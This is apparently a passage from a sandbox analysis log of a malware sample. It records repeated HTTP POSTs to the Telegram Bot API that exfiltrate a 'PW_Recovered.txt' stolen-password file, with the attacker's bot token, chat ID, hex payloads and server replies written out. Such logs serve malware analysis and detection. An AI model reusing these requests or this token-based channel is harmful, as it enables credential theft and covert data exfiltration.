                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.750011149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:27 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd35652fc0d40e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:27 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 36 35 32 66 63 30 64 34 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd35652fc0d40eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:30 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:30 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:30 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41010,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546850,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.750012149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:31 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd35fa1b258218
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:31 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 66 61 31 62 32 35 38 32 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd35fa1b258218Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:31 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:31 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:31 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41011,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546851,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.750013149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:32 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3635e1258cc8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:32 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 33 35 65 31 32 35 38 63 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3635e1258cc8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:32 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:32 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:32 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41012,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546852,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.750014149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:33 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3681b72dd0b8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:33 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 38 31 62 37 32 64 64 30 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3681b72dd0b8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:33 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:33 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41013,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546853,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.750015149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:34 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd36a5d1642b7d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:34 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 61 35 64 31 36 34 32 62 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd36a5d1642b7dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:34 UTC370INHTTP/1.1 429 Too Many Requests
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:34 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 111
                                                                                                            Connection: close
                                                                                                            Retry-After: 10
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:34 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.750016149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:35 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd36f2934ae498
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:35 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 66 32 39 33 34 61 65 34 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd36f2934ae498Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:35 UTC369INHTTP/1.1 429 Too Many Requests
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 109
                                                                                                            Connection: close
                                                                                                            Retry-After: 9
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:35 UTC109INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.750017149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:36 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3744214678b7
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:36 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 34 34 32 31 34 36 37 38 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3744214678b7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:44 UTC369INHTTP/1.1 429 Too Many Requests
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 109
                                                                                                            Connection: close
                                                                                                            Retry-After: 3
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:44 UTC109INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.750018149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:45 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd39fc539c7760
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:45 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 39 66 63 35 33 39 63 37 37 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd39fc539c7760Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:45 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:45 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
